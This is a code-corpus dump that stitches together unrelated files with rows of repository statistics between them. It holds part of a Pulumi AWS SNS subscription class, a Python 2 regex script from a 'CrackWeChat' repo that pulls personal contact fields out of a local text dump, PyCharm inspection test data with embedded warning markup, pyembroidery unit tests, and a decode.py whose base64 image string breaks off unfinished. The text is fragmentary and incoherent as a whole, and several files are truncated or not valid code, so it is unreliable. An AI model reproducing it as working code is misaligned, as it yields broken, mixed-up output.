owner_id: Optional[pulumi.Input[str]] = None,
pending_confirmation: Optional[pulumi.Input[bool]] = None,
protocol: Optional[pulumi.Input[str]] = None,
raw_message_delivery: Optional[pulumi.Input[bool]] = None,
redrive_policy: Optional[pulumi.Input[str]] = None,
subscription_role_arn: Optional[pulumi.Input[str]] = None,
topic: Optional[pulumi.Input[str]] = None) -> 'TopicSubscription':
"""
Get an existing TopicSubscription resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] arn: ARN of the subscription.
:param pulumi.Input[int] confirmation_timeout_in_minutes: Integer indicating number of minutes to wait in retrying mode for fetching subscription arn before marking it as failure. Only applicable for http and https protocols. Default is `1`.
:param pulumi.Input[bool] confirmation_was_authenticated: Whether the subscription confirmation request was authenticated.
:param pulumi.Input[str] delivery_policy: JSON String with the delivery policy (retries, backoff, etc.) that will be used in the subscription - this only applies to HTTP/S subscriptions. Refer to the [SNS docs](https://docs.aws.amazon.com/sns/latest/dg/DeliveryPolicies.html) for more details.
:param pulumi.Input[str] endpoint: Endpoint to send data to. The contents vary with the protocol. See details below.
:param pulumi.Input[bool] endpoint_auto_confirms: Whether the endpoint is capable of [auto confirming subscription](http://docs.aws.amazon.com/sns/latest/dg/SendMessageToHttp.html#SendMessageToHttp.prepare) (e.g., PagerDuty). Default is `false`.
:param pulumi.Input[str] filter_policy: JSON String with the filter policy that will be used in the subscription to filter messages seen by the target resource. Refer to the [SNS docs](https://docs.aws.amazon.com/sns/latest/dg/message-filtering.html) for more details.
:param pulumi.Input[str] owner_id: AWS account ID of the subscription's owner.
:param pulumi.Input[bool] pending_confirmation: Whether the subscription has not been confirmed.
:param pulumi.Input[str] protocol: Protocol to use. Valid values are: `sqs`, `sms`, `lambda`, `firehose`, and `application`. Protocols `email`, `email-json`, `http` and `https` are also valid but partially supported. See details below.
:param pulumi.Input[bool] raw_message_delivery: Whether to enable raw message delivery (the original message is directly passed, not wrapped in JSON with the original message in the message property). Default is `false`.
:param pulumi.Input[str] redrive_policy: JSON String with the redrive policy that will be used in the subscription. Refer to the [SNS docs](https://docs.aws.amazon.com/sns/latest/dg/sns-dead-letter-queues.html#how-messages-moved-into-dead-letter-queue) for more details.
:param pulumi.Input[str] subscription_role_arn: ARN of the IAM role to publish to Kinesis Data Firehose delivery stream. Refer to [SNS docs](https://docs.aws.amazon.com/sns/latest/dg/sns-firehose-as-subscriber.html).
:param pulumi.Input[str] topic: ARN of the SNS topic to subscribe to.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _TopicSubscriptionState.__new__(_TopicSubscriptionState)
__props__.__dict__["arn"] = arn
__props__.__dict__["confirmation_timeout_in_minutes"] = confirmation_timeout_in_minutes
__props__.__dict__["confirmation_was_authenticated"] = confirmation_was_authenticated
__props__.__dict__["delivery_policy"] = delivery_policy
__props__.__dict__["endpoint"] = endpoint
__props__.__dict__["endpoint_auto_confirms"] = endpoint_auto_confirms
__props__.__dict__["filter_policy"] = filter_policy
__props__.__dict__["owner_id"] = owner_id
__props__.__dict__["pending_confirmation"] = pending_confirmation
__props__.__dict__["protocol"] = protocol
__props__.__dict__["raw_message_delivery"] = raw_message_delivery
__props__.__dict__["redrive_policy"] = redrive_policy
__props__.__dict__["subscription_role_arn"] = subscription_role_arn
__props__.__dict__["topic"] = topic
return TopicSubscription(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def arn(self) -> pulumi.Output[str]:
"""
ARN of the subscription.
"""
return pulumi.get(self, "arn")
@property
@pulumi.getter(name="confirmationTimeoutInMinutes")
def confirmation_timeout_in_minutes(self) -> pulumi.Output[Optional[int]]:
"""
Integer indicating number of minutes to wait in retrying mode for fetching subscription arn before marking it as failure. Only applicable for http and https protocols. Default is `1`.
"""
return pulumi.get(self, "confirmation_timeout_in_minutes")
@property
@pulumi.getter(name="confirmationWasAuthenticated")
def confirmation_was_authenticated(self) -> pulumi.Output[bool]:
"""
Whether the subscription confirmation request was authenticated.
"""
return pulumi.get(self, "confirmation_was_authenticated")
@property
@pulumi.getter(name="deliveryPolicy")
def delivery_policy(self) -> pulumi.Output[Optional[str]]:
"""
JSON String with the delivery policy (retries, backoff, etc.) that will be used in the subscription - this only applies to HTTP/S subscriptions. Refer to the [SNS docs](https://docs.aws.amazon.com/sns/latest/dg/DeliveryPolicies.html) for more details.
"""
return pulumi.get(self, "delivery_policy")
@property
@pulumi.getter
def endpoint(self) -> pulumi.Output[str]:
"""
Endpoint to send data to. The contents vary with the protocol. See details below.
"""
return pulumi.get(self, "endpoint")
@property
@pulumi.getter(name="endpointAutoConfirms")
def endpoint_auto_confirms(self) -> pulumi.Output[Optional[bool]]:
"""
Whether the endpoint is capable of [auto confirming subscription](http://docs.aws.amazon.com/sns/latest/dg/SendMessageToHttp.html#SendMessageToHttp.prepare) (e.g., PagerDuty). Default is `false`.
"""
return pulumi.get(self, "endpoint_auto_confirms")
@property
@pulumi.getter(name="filterPolicy")
def filter_policy(self) -> pulumi.Output[Optional[str]]:
"""
JSON String with the filter policy that will be used in the subscription to filter messages seen by the target resource. Refer to the [SNS docs](https://docs.aws.amazon.com/sns/latest/dg/message-filtering.html) for more details.
"""
return pulumi.get(self, "filter_policy")
@property
@pulumi.getter(name="ownerId")
def owner_id(self) -> pulumi.Output[str]:
"""
AWS account ID of the subscription's owner.
"""
return pulumi.get(self, "owner_id")
@property
@pulumi.getter(name="pendingConfirmation")
def pending_confirmation(self) -> pulumi.Output[bool]:
"""
Whether the subscription has not been confirmed.
"""
return pulumi.get(self, "pending_confirmation")
@property
@pulumi.getter
def protocol(self) -> pulumi.Output[str]:
"""
Protocol to use. Valid values are: `sqs`, `sms`, `lambda`, `firehose`, and `application`. Protocols `email`, `email-json`, `http` and `https` are also valid but partially supported. See details below.
"""
return pulumi.get(self, "protocol")
@property
@pulumi.getter(name="rawMessageDelivery")
def raw_message_delivery(self) -> pulumi.Output[Optional[bool]]:
"""
Whether to enable raw message delivery (the original message is directly passed, not wrapped in JSON with the original message in the message property). Default is `false`.
"""
return pulumi.get(self, "raw_message_delivery")
@property
@pulumi.getter(name="redrivePolicy")
def redrive_policy(self) -> pulumi.Output[Optional[str]]:
"""
JSON String with the redrive policy that will be used in the subscription. Refer to the [SNS docs](https://docs.aws.amazon.com/sns/latest/dg/sns-dead-letter-queues.html#how-messages-moved-into-dead-letter-queue) for more details.
"""
return pulumi.get(self, "redrive_policy")
@property
@pulumi.getter(name="subscriptionRoleArn")
def subscription_role_arn(self) -> pulumi.Output[Optional[str]]:
"""
ARN of the IAM role to publish to Kinesis Data Firehose delivery stream. Refer to [SNS docs](https://docs.aws.amazon.com/sns/latest/dg/sns-firehose-as-subscriber.html).
"""
return pulumi.get(self, "subscription_role_arn")
@property
@pulumi.getter
def topic(self) -> pulumi.Output[str]:
"""
ARN of the SNS topic to subscribe to.
"""
return pulumi.get(self, "topic")
| 61.055402
| 750
| 0.696634
| 5,659
| 44,082
| 5.265595
| 0.057607
| 0.058326
| 0.049332
| 0.045775
| 0.928082
| 0.911336
| 0.899557
| 0.880294
| 0.875495
| 0.856299
| 0
| 0.002226
| 0.205004
| 44,082
| 721
| 751
| 61.140083
| 0.848053
| 0.475818
| 0
| 0.732057
| 1
| 0
| 0.121825
| 0.048842
| 0
| 0
| 0
| 0
| 0
| 1
| 0.165072
| false
| 0.002392
| 0.011962
| 0
| 0.277512
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
632e657c2c55ebf6b6629dd8c81784e30e2577a5
| 1,464
|
py
|
Python
|
regex/regex.py
|
yukar1z0e/CrackWeChat
|
65c181033b8c290693cc37a82d29448fd568ed8c
|
[
"Apache-2.0"
] | 10
|
2019-09-16T09:24:16.000Z
|
2021-07-22T07:20:13.000Z
|
regex/regex.py
|
yukar1z0e/CrackWeChat
|
65c181033b8c290693cc37a82d29448fd568ed8c
|
[
"Apache-2.0"
] | null | null | null |
regex/regex.py
|
yukar1z0e/CrackWeChat
|
65c181033b8c290693cc37a82d29448fd568ed8c
|
[
"Apache-2.0"
] | 15
|
2019-09-22T19:37:50.000Z
|
2022-01-18T06:08:21.000Z
|
# -*- coding: UTF-0 -*-
import os
import os.path
import re
print "-----------"
for line in open("C:/Users/yakum/Desktop/test0.txt", 'rb'):
it0=re.finditer(r"(?<=;Alias: ).*?(?=;EncryptUsername)",str(line))
for match0 in it0:
print match0.group()
print "-----------"
for line in open("C:/Users/yakum/Desktop/test0.txt", 'rb'):
it0=re.finditer(r"(?<=;PyInitial: ).*?(?=;Nickname)",str(line))
for match0 in it0:
print match0.group()
print "-----------"
for line in open("C:/Users/yakum/Desktop/test0.txt", 'rb'):
it0=re.finditer(r"(?<=;Nickname: ).*?(?=;Province)",str(line))
for match0 in it0:
print match0.group()
print "-----------"
for line in open("C:/Users/yakum/Desktop/test0.txt", 'rb'):
it0=re.finditer(r"(?<=;Province: ).*?(?=;City)",str(line))
for match0 in it0:
print match0.group()
print "-----------"
for line in open("C:/Users/yakum/Desktop/test0.txt", 'rb'):
it0=re.finditer(r"(?<=;City: ).*?(?=;Signature)",str(line))
for match0 in it0:
print match0.group()
print "-----------"
for line in open("C:/Users/yakum/Desktop/test0.txt", 'rb'):
it0=re.finditer(r"(?<=;Signature: ).*?(?=;Sex)",str(line))
for match0 in it0:
print match0.group()
print "-----------"
for line in open("C:/Users/yakum/Desktop/test0.txt", 'rb'):
it0=re.finditer(r"(?<=;Sex: ).*?(?=;EN)",str(line))
for match0 in it0:
print match0.group()
print "-----------"
| 34.046512
| 70
| 0.55806
| 200
| 1,464
| 4.085
| 0.17
| 0.068543
| 0.102815
| 0.119951
| 0.837209
| 0.837209
| 0.837209
| 0.837209
| 0.837209
| 0.837209
| 0
| 0.029388
| 0.163251
| 1,464
| 42
| 71
| 34.857143
| 0.637551
| 0.014344
| 0
| 0.74359
| 0
| 0
| 0.370139
| 0.172222
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.076923
| null | null | 0.384615
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
2d64733b86cb737f0cd64d405e2294e80be5cb0a
| 913
|
py
|
Python
|
python/testData/inspections/PyTypeCheckerInspection/ComparisonOperators.py
|
jnthn/intellij-community
|
8fa7c8a3ace62400c838e0d5926a7be106aa8557
|
[
"Apache-2.0"
] | 2
|
2019-04-28T07:48:50.000Z
|
2020-12-11T14:18:08.000Z
|
python/testData/inspections/PyTypeCheckerInspection/ComparisonOperators.py
|
Cyril-lamirand/intellij-community
|
60ab6c61b82fc761dd68363eca7d9d69663cfa39
|
[
"Apache-2.0"
] | 173
|
2018-07-05T13:59:39.000Z
|
2018-08-09T01:12:03.000Z
|
python/testData/inspections/PyTypeCheckerInspection/ComparisonOperators.py
|
Cyril-lamirand/intellij-community
|
60ab6c61b82fc761dd68363eca7d9d69663cfa39
|
[
"Apache-2.0"
] | 2
|
2020-03-15T08:57:37.000Z
|
2020-04-07T04:48:14.000Z
|
def test():
def f(x):
"""
:type x: str
"""
pass
class C(object):
def __gt__(self, other):
return []
o = object()
c = C()
f(<warning descr="Expected type 'str', got 'bool' instead">1 < 2</warning>)
f(<warning descr="Expected type 'str', got 'bool' instead">o == o</warning>)
f(<warning descr="Expected type 'str', got 'bool' instead">o >= o</warning>)
f(<warning descr="Expected type 'str', got 'bool' instead">'foo' > 'bar'</warning>)
f(<warning descr="Expected type 'str', got 'bool' instead"><warning descr="Expected type 'int', got 'C' instead">c</warning> < 1</warning>)
f(<warning descr="Expected type 'str', got 'list' instead">c > 1</warning>)
f(<warning descr="Expected type 'str', got 'bool' instead">c == 1</warning>)
f(<warning descr="Expected type 'str', got 'bool' instead">c in [1, 2, 3]</warning>)
| 45.65
| 143
| 0.580504
| 129
| 913
| 4.077519
| 0.224806
| 0.205323
| 0.342205
| 0.410646
| 0.743346
| 0.743346
| 0.743346
| 0.743346
| 0.743346
| 0.589354
| 0
| 0.011268
| 0.222344
| 913
| 19
| 144
| 48.052632
| 0.729577
| 0
| 0
| 0
| 0
| 0
| 0.403649
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.0625
| 0
| null | null | 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
2d66c6761be5cf43ee49fb07d7e5c9209cd76478
| 4,158
|
py
|
Python
|
test/test_encoder.py
|
mrjohnmain/pyembroidery
|
3acaa543e3ffaad67f83092ab3151fce87c76ec4
|
[
"MIT"
] | null | null | null |
test/test_encoder.py
|
mrjohnmain/pyembroidery
|
3acaa543e3ffaad67f83092ab3151fce87c76ec4
|
[
"MIT"
] | null | null | null |
test/test_encoder.py
|
mrjohnmain/pyembroidery
|
3acaa543e3ffaad67f83092ab3151fce87c76ec4
|
[
"MIT"
] | null | null | null |
from __future__ import print_function
import unittest
from pattern_for_tests import *
class TestEmbpattern(unittest.TestCase):
def test_encoder_bookend_color_break(self):
pattern = EmbPattern()
pattern.add_command(COLOR_BREAK)
pattern.add_command(COLOR_BREAK)
pattern.add_command(COLOR_BREAK)
pattern.add_command(COLOR_BREAK)
pattern.stitch_abs(0, 0)
pattern.stitch_abs(0, 100)
pattern.stitch_abs(100, 100)
pattern.stitch_abs(100, 0)
pattern.stitch_abs(0, 0)
pattern.add_thread("red")
pattern.add_command(COLOR_BREAK)
pattern.add_command(COLOR_BREAK)
pattern.add_command(COLOR_BREAK)
pattern.add_command(COLOR_BREAK)
pattern = pattern.get_normalized_pattern()
self.assertEqual(len(pattern.threadlist), 1)
self.assertEqual(pattern.count_stitch_commands(COLOR_CHANGE), 0)
def test_encoder_multiple_internal_breaks(self):
pattern = EmbPattern()
pattern.add_command(COLOR_BREAK)
pattern.stitch_abs(0, 0)
pattern.stitch_abs(0, 100)
pattern.stitch_abs(100, 100)
pattern.stitch_abs(100, 0)
pattern.stitch_abs(0, 0)
pattern.add_thread("red")
pattern.add_command(COLOR_BREAK)
pattern.add_command(COLOR_BREAK)
pattern.add_command(COLOR_BREAK)
pattern.add_command(COLOR_BREAK)
pattern.stitch_abs(0, 0)
pattern.stitch_abs(0, 100)
pattern.stitch_abs(100, 100)
pattern.stitch_abs(100, 0)
pattern.stitch_abs(0, 0)
pattern.add_thread("green")
pattern.add_command(COLOR_BREAK)
pattern = pattern.get_normalized_pattern()
self.assertEqual(pattern.count_stitch_commands(COLOR_CHANGE), 4)
self.assertEqual(len(pattern.threadlist), 5)
def test_encoder_colorchange(self):
pattern = EmbPattern()
pattern.add_command(COLOR_BREAK)
pattern.stitch_abs(0, 0)
pattern.stitch_abs(0, 100)
pattern.stitch_abs(100, 100)
pattern.stitch_abs(100, 0)
pattern.stitch_abs(0, 0)
pattern.add_thread("red")
pattern.add_command(COLOR_BREAK)
pattern.stitch_abs(0, 0)
pattern.stitch_abs(0, 100)
pattern.stitch_abs(100, 100)
pattern.stitch_abs(100, 0)
pattern.stitch_abs(0, 0)
pattern.add_thread("green")
pattern.add_command(COLOR_BREAK)
pattern.stitch_abs(0, 0)
pattern.stitch_abs(0, 100)
pattern.stitch_abs(100, 100)
pattern.stitch_abs(100, 0)
pattern.stitch_abs(0, 0)
pattern.add_thread("blue")
pattern.add_command(COLOR_BREAK)
pattern = pattern.get_normalized_pattern()
self.assertEqual(pattern.count_stitch_commands(COLOR_CHANGE) + 1, len(pattern.threadlist))
def test_encoder_needleset(self):
pattern = EmbPattern()
pattern.add_command(COLOR_BREAK)
pattern.stitch_abs(0, 0)
pattern.stitch_abs(0, 100)
pattern.stitch_abs(100, 100)
pattern.stitch_abs(100, 0)
pattern.stitch_abs(0, 0)
pattern.add_thread("red")
pattern.add_command(COLOR_BREAK)
pattern.stitch_abs(0, 0)
pattern.stitch_abs(0, 100)
pattern.stitch_abs(100, 100)
pattern.stitch_abs(100, 0)
pattern.stitch_abs(0, 0)
pattern.add_thread("green")
pattern.add_command(COLOR_BREAK)
pattern.stitch_abs(0, 0)
pattern.stitch_abs(0, 100)
pattern.stitch_abs(100, 100)
pattern.stitch_abs(100, 0)
pattern.stitch_abs(0, 0)
pattern.add_thread("blue")
pattern.add_command(COLOR_BREAK)
pattern = pattern.get_normalized_pattern({"thread_change_command": NEEDLE_SET})
self.assertEqual(pattern.count_stitch_commands(NEEDLE_SET), len(pattern.threadlist))
def test_transcode_to_self(self):
pattern = get_shift_pattern()
from pyembroidery.EmbEncoder import Transcoder
encoder = Transcoder()
encoder.transcode(pattern, pattern)
self.assertNotEquals(len(pattern.stitches), 0)
| 36.473684
| 98
| 0.664262
| 524
| 4,158
| 4.994275
| 0.10687
| 0.223538
| 0.275124
| 0.175392
| 0.839129
| 0.797478
| 0.781811
| 0.781811
| 0.761941
| 0.753917
| 0
| 0.052947
| 0.236893
| 4,158
| 113
| 99
| 36.79646
| 0.771825
| 0
| 0
| 0.798077
| 0
| 0
| 0.013468
| 0.005051
| 0
| 0
| 0
| 0
| 0.067308
| 1
| 0.048077
| false
| 0
| 0.038462
| 0
| 0.096154
| 0.009615
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
2dc6bfadc24ecea9f04ddd365686b61005d405ce
| 31,719
|
py
|
Python
|
indriyaan-frontend/decode.py
|
saurav111/indriyaan
|
276f2af95d6a7b67c9c5021a14911127e4f76649
|
[
"MIT"
] | null | null | null |
indriyaan-frontend/decode.py
|
saurav111/indriyaan
|
276f2af95d6a7b67c9c5021a14911127e4f76649
|
[
"MIT"
] | null | null | null |
indriyaan-frontend/decode.py
|
saurav111/indriyaan
|
276f2af95d6a7b67c9c5021a14911127e4f76649
|
[
"MIT"
] | null | null | null |
import base64
string = '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